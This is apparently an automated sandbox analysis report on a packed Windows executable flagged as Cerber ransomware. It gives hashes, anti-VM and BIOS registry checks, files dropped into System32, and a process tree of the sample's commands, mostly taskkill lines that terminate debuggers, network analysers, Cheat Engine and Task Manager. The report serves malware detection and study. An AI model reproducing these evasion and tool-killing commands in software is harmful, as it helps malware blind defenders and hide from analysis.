cerber | f62d4ee2fb48f64e69bfbc3c2a467245da06b67feafe3fec54e4e80f5b32b350

Analysis

max time kernel
30s
max time network
23s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
07/03/2025, 17:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Karin Perm_protected.exe
Size

4.4MB
MD5

609bd04323c87ac5b9ef563bb517508d
SHA1

4bd292594f7e3867a3ae62f19b8a5728fb541aad
SHA256

f62d4ee2fb48f64e69bfbc3c2a467245da06b67feafe3fec54e4e80f5b32b350
SHA512

1e49def2e8c824a5bb9de3df1dec5a08a4a00cc988f3120d526e7ebfa261c937839b4318b7c3e8abba254946fd349531771d3d1c27295c3f9be97444e82a8e59
SSDEEP

98304:VbQ0IUsAcJNoQNUxyses8FmyqU2Yv35Dl6duhUt:VV+J2SUTmqUX9lHit

Score

10^/10

cerber defense_evasion ransomware themida trojan

Malware Config

Signatures

Cerber 64 IoCs

Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

ransomware cerber

description	ioc	pid	Process
		2088	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		4868	taskkill.exe
		3136	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		724	taskkill.exe
		2212	taskkill.exe
		564	taskkill.exe
		2972	taskkill.exe
		3528	taskkill.exe
		3276	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		2028	taskkill.exe
		1944	taskkill.exe
		4736	taskkill.exe
		5032	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		4640	taskkill.exe
		2256	taskkill.exe
		4164	taskkill.exe
		3408	taskkill.exe
		1628	taskkill.exe
		4972	taskkill.exe
		3404	taskkill.exe
		2212	taskkill.exe
		2824	taskkill.exe
		3656	taskkill.exe
		4548	taskkill.exe
		4348	taskkill.exe
		3184	taskkill.exe
		3656	taskkill.exe
		1684	taskkill.exe
		4284	taskkill.exe
		4528	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		2852	taskkill.exe
		1608	taskkill.exe
		3516	taskkill.exe
		1628	taskkill.exe
		3544	taskkill.exe
		3392	taskkill.exe
		2908	taskkill.exe
		1076	taskkill.exe
		2652	taskkill.exe
		2780	taskkill.exe
		2456	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		3640	taskkill.exe
		3572	taskkill.exe
		4152	taskkill.exe
		428	taskkill.exe
		2044	taskkill.exe
		4568	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		1168	taskkill.exe
		2848	taskkill.exe
		972	taskkill.exe
		2300	taskkill.exe
		3524	taskkill.exe
		3644	taskkill.exe
		2296	taskkill.exe
		5052	taskkill.exe
		4280	taskkill.exe

Cerber family
cerber

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Karin Perm_protected.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Karin Perm_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Karin Perm_protected.exe

Executes dropped EXE 22 IoCs

pid	Process
1924	AMIDEWINx64.EXE
1920	AMIDEWINx64.EXE
4116	AMIDEWINx64.EXE
3656	AMIDEWINx64.EXE
3112	AMIDEWINx64.EXE
2248	AMIDEWINx64.EXE
2028	AMIDEWINx64.EXE
664	AMIDEWINx64.EXE
1384	AMIDEWINx64.EXE
4440	AMIDEWINx64.EXE
1400	AMIDEWINx64.EXE
3252	AMIDEWINx64.EXE
1548	AMIDEWINx64.EXE
3856	AMIDEWINx64.EXE
1984	AMIDEWINx64.EXE
3676	AMIDEWINx64.EXE
1464	AMIDEWINx64.EXE
1068	AMIDEWINx64.EXE
2088	AMIDEWINx64.EXE
1200	AMIDEWINx64.EXE
3868	AMIDEWINx64.EXE
1580	AMIDEWINx64.EXE

Themida packer 8 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/3432-0-0x0000000140000000-0x0000000140BBF000-memory.dmp	themida
behavioral1/memory/3432-2-0x0000000140000000-0x0000000140BBF000-memory.dmp	themida
behavioral1/memory/3432-3-0x0000000140000000-0x0000000140BBF000-memory.dmp	themida
behavioral1/memory/3432-5-0x0000000140000000-0x0000000140BBF000-memory.dmp	themida
behavioral1/memory/3432-4-0x0000000140000000-0x0000000140BBF000-memory.dmp	themida
behavioral1/memory/3432-6-0x0000000140000000-0x0000000140BBF000-memory.dmp	themida
behavioral1/memory/3432-34-0x0000000140000000-0x0000000140BBF000-memory.dmp	themida
behavioral1/memory/3432-36-0x0000000140000000-0x0000000140BBF000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Karin Perm_protected.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\amifldrv64.sys	Karin Perm_protected.exe
File created	C:\Windows\System32\AMIDEWINx64.EXE	Karin Perm_protected.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3432	Karin Perm_protected.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\EasyAntiCheat_EOS\gvi5ia.bat	curl.exe

Kills process with taskkill 64 IoCs

defense_evasion

pid	Process
2256	taskkill.exe
3548	taskkill.exe
2596	taskkill.exe
3440	taskkill.exe
1368	taskkill.exe
2300	taskkill.exe
5004	taskkill.exe
1536	taskkill.exe
2792	taskkill.exe
3136	taskkill.exe
3544	taskkill.exe
1676	taskkill.exe
576	taskkill.exe
4736	taskkill.exe
2156	taskkill.exe
3516	taskkill.exe
2780	taskkill.exe
1572	taskkill.exe
3404	taskkill.exe
1092	taskkill.exe
3184	taskkill.exe
972	taskkill.exe
4088	taskkill.exe
4328	taskkill.exe
2796	taskkill.exe
3536	taskkill.exe
2848	taskkill.exe
4424	taskkill.exe
3572	taskkill.exe
3656	taskkill.exe
2296	taskkill.exe
5020	taskkill.exe
336	taskkill.exe
724	taskkill.exe
2984	taskkill.exe
3900	taskkill.exe
3792	taskkill.exe
2848	taskkill.exe
1944	taskkill.exe
2096	taskkill.exe
4564	taskkill.exe
4696	taskkill.exe
972	taskkill.exe
1168	taskkill.exe
2136	taskkill.exe
1380	taskkill.exe
2300	taskkill.exe
3644	taskkill.exe
3656	taskkill.exe
2212	taskkill.exe
2264	taskkill.exe
2020	taskkill.exe
4520	taskkill.exe
2500	taskkill.exe
336	taskkill.exe
1336	taskkill.exe
1188	taskkill.exe
4444	taskkill.exe
3672	taskkill.exe
4640	taskkill.exe
1420	taskkill.exe
2264	taskkill.exe
1608	taskkill.exe
1372	taskkill.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
3432	Karin Perm_protected.exe
3432	Karin Perm_protected.exe
3432	Karin Perm_protected.exe
3432	Karin Perm_protected.exe
3432	Karin Perm_protected.exe
3432	Karin Perm_protected.exe
3432	Karin Perm_protected.exe
3432	Karin Perm_protected.exe
3432	Karin Perm_protected.exe
3432	Karin Perm_protected.exe

Suspicious behavior: LoadsDriver 22 IoCs

pid	Process
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found
680	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2028	taskkill.exe
Token: SeDebugPrivilege	3524	taskkill.exe
Token: SeDebugPrivilege	3408	taskkill.exe
Token: SeDebugPrivilege	1188	taskkill.exe
Token: SeDebugPrivilege	3392	taskkill.exe
Token: SeDebugPrivilege	4348	taskkill.exe
Token: SeDebugPrivilege	4164	taskkill.exe
Token: SeDebugPrivilege	5032	taskkill.exe
Token: SeDebugPrivilege	2300	taskkill.exe
Token: SeDebugPrivilege	3292	taskkill.exe
Token: SeDebugPrivilege	3644	taskkill.exe
Token: SeDebugPrivilege	2500	taskkill.exe
Token: SeDebugPrivilege	2456	taskkill.exe
Token: SeDebugPrivilege	5004	taskkill.exe
Token: SeDebugPrivilege	1372	taskkill.exe
Token: SeDebugPrivilege	2908	taskkill.exe
Token: SeDebugPrivilege	4972	taskkill.exe
Token: SeDebugPrivilege	1092	taskkill.exe
Token: SeDebugPrivilege	2984	taskkill.exe
Token: SeDebugPrivilege	560	taskkill.exe
Token: SeDebugPrivilege	3900	taskkill.exe
Token: SeDebugPrivilege	2296	taskkill.exe
Token: SeDebugPrivilege	5052	taskkill.exe
Token: SeDebugPrivilege	4548	taskkill.exe
Token: SeDebugPrivilege	720	taskkill.exe
Token: SeDebugPrivilege	3528	taskkill.exe
Token: SeDebugPrivilege	2652	taskkill.exe
Token: SeDebugPrivilege	4444	taskkill.exe
Token: SeDebugPrivilege	1076	taskkill.exe
Token: SeDebugPrivilege	1684	taskkill.exe
Token: SeDebugPrivilege	3792	taskkill.exe
Token: SeDebugPrivilege	2840	taskkill.exe
Token: SeDebugPrivilege	3092	taskkill.exe
Token: SeDebugPrivilege	1536	taskkill.exe
Token: SeDebugPrivilege	2792	taskkill.exe
Token: SeDebugPrivilege	4164	taskkill.exe
Token: SeDebugPrivilege	2156	taskkill.exe
Token: SeDebugPrivilege	4156	taskkill.exe
Token: SeDebugPrivilege	2848	taskkill.exe
Token: SeDebugPrivilege	4328	taskkill.exe
Token: SeDebugPrivilege	3136	taskkill.exe
Token: SeDebugPrivilege	3516	taskkill.exe
Token: SeDebugPrivilege	1944	taskkill.exe
Token: SeDebugPrivilege	3404	taskkill.exe
Token: SeDebugPrivilege	1204	taskkill.exe
Token: SeDebugPrivilege	2972	taskkill.exe
Token: SeDebugPrivilege	4972	taskkill.exe
Token: SeDebugPrivilege	1092	taskkill.exe
Token: SeDebugPrivilege	2088	taskkill.exe
Token: SeDebugPrivilege	1336	taskkill.exe
Token: SeDebugPrivilege	1628	taskkill.exe
Token: SeDebugPrivilege	4868	taskkill.exe
Token: SeDebugPrivilege	3544	taskkill.exe
Token: SeDebugPrivilege	2104	taskkill.exe
Token: SeDebugPrivilege	5024	taskkill.exe
Token: SeDebugPrivilege	3656	taskkill.exe
Token: SeDebugPrivilege	4520	taskkill.exe
Token: SeDebugPrivilege	4284	taskkill.exe
Token: SeDebugPrivilege	4080	taskkill.exe
Token: SeDebugPrivilege	892	taskkill.exe
Token: SeDebugPrivilege	4152	taskkill.exe
Token: SeDebugPrivilege	2780	taskkill.exe
Token: SeDebugPrivilege	664	taskkill.exe
Token: SeDebugPrivilege	4264	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3432 wrote to memory of 4928	3432	Karin Perm_protected.exe	83
PID 3432 wrote to memory of 4928	3432	Karin Perm_protected.exe	83
PID 4928 wrote to memory of 2028	4928	cmd.exe	84
PID 4928 wrote to memory of 2028	4928	cmd.exe	84
PID 3432 wrote to memory of 2108	3432	Karin Perm_protected.exe	86
PID 3432 wrote to memory of 2108	3432	Karin Perm_protected.exe	86
PID 2108 wrote to memory of 3524	2108	cmd.exe	87
PID 2108 wrote to memory of 3524	2108	cmd.exe	87
PID 3432 wrote to memory of 576	3432	Karin Perm_protected.exe	88
PID 3432 wrote to memory of 576	3432	Karin Perm_protected.exe	88
PID 576 wrote to memory of 3408	576	cmd.exe	89
PID 576 wrote to memory of 3408	576	cmd.exe	89
PID 3432 wrote to memory of 2024	3432	Karin Perm_protected.exe	90
PID 3432 wrote to memory of 2024	3432	Karin Perm_protected.exe	90
PID 2024 wrote to memory of 1188	2024	cmd.exe	91
PID 2024 wrote to memory of 1188	2024	cmd.exe	91
PID 3432 wrote to memory of 1536	3432	Karin Perm_protected.exe	92
PID 3432 wrote to memory of 1536	3432	Karin Perm_protected.exe	92
PID 1536 wrote to memory of 3392	1536	cmd.exe	93
PID 1536 wrote to memory of 3392	1536	cmd.exe	93
PID 3432 wrote to memory of 2792	3432	Karin Perm_protected.exe	94
PID 3432 wrote to memory of 2792	3432	Karin Perm_protected.exe	94
PID 2792 wrote to memory of 4348	2792	cmd.exe	95
PID 2792 wrote to memory of 4348	2792	cmd.exe	95
PID 3432 wrote to memory of 2016	3432	Karin Perm_protected.exe	96
PID 3432 wrote to memory of 2016	3432	Karin Perm_protected.exe	96
PID 2016 wrote to memory of 4164	2016	cmd.exe	97
PID 2016 wrote to memory of 4164	2016	cmd.exe	97
PID 3432 wrote to memory of 2968	3432	Karin Perm_protected.exe	98
PID 3432 wrote to memory of 2968	3432	Karin Perm_protected.exe	98
PID 3432 wrote to memory of 5020	3432	Karin Perm_protected.exe	99
PID 3432 wrote to memory of 5020	3432	Karin Perm_protected.exe	99
PID 5020 wrote to memory of 5032	5020	cmd.exe	100
PID 5020 wrote to memory of 5032	5020	cmd.exe	100
PID 3432 wrote to memory of 4424	3432	Karin Perm_protected.exe	101
PID 3432 wrote to memory of 4424	3432	Karin Perm_protected.exe	101
PID 4424 wrote to memory of 2300	4424	cmd.exe	102
PID 4424 wrote to memory of 2300	4424	cmd.exe	102
PID 3432 wrote to memory of 4160	3432	Karin Perm_protected.exe	103
PID 3432 wrote to memory of 4160	3432	Karin Perm_protected.exe	103
PID 4160 wrote to memory of 3292	4160	cmd.exe	104
PID 4160 wrote to memory of 3292	4160	cmd.exe	104
PID 3432 wrote to memory of 3604	3432	Karin Perm_protected.exe	105
PID 3432 wrote to memory of 3604	3432	Karin Perm_protected.exe	105
PID 3604 wrote to memory of 3644	3604	cmd.exe	106
PID 3604 wrote to memory of 3644	3604	cmd.exe	106
PID 3432 wrote to memory of 4244	3432	Karin Perm_protected.exe	107
PID 3432 wrote to memory of 4244	3432	Karin Perm_protected.exe	107
PID 4244 wrote to memory of 2500	4244	cmd.exe	108
PID 4244 wrote to memory of 2500	4244	cmd.exe	108
PID 3432 wrote to memory of 3236	3432	Karin Perm_protected.exe	109
PID 3432 wrote to memory of 3236	3432	Karin Perm_protected.exe	109
PID 3236 wrote to memory of 2456	3236	cmd.exe	110
PID 3236 wrote to memory of 2456	3236	cmd.exe	110
PID 3432 wrote to memory of 872	3432	Karin Perm_protected.exe	111
PID 3432 wrote to memory of 872	3432	Karin Perm_protected.exe	111
PID 872 wrote to memory of 5004	872	cmd.exe	112
PID 872 wrote to memory of 5004	872	cmd.exe	112
PID 3432 wrote to memory of 456	3432	Karin Perm_protected.exe	113
PID 3432 wrote to memory of 456	3432	Karin Perm_protected.exe	113
PID 456 wrote to memory of 1608	456	cmd.exe	114
PID 456 wrote to memory of 1608	456	cmd.exe	114
PID 3432 wrote to memory of 2136	3432	Karin Perm_protected.exe	115
PID 3432 wrote to memory of 2136	3432	Karin Perm_protected.exe	115

C:\Users\Admin\AppData\Local\Temp\Karin Perm_protected.exe
"C:\Users\Admin\AppData\Local\Temp\Karin Perm_protected.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4928
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2108
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:3524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:576
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:3408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2024
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1536
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:3392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2792
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:4348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2016
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:4164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5020
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:5032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4424
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4160
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3604
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4244
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3236
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:872
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:456
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:1608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:2136
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:1868
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:4896
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:1932
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:1380
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:4568
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:1748
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:4736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:3796
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:1828
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:1588
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:5052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:968
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:4548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4180
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3112
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:3528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4880
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:2256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:4524
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:3732
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:2372
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:1076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:3460
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:1684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:4928
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4512
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1112
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3392
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:4348
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:4784
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
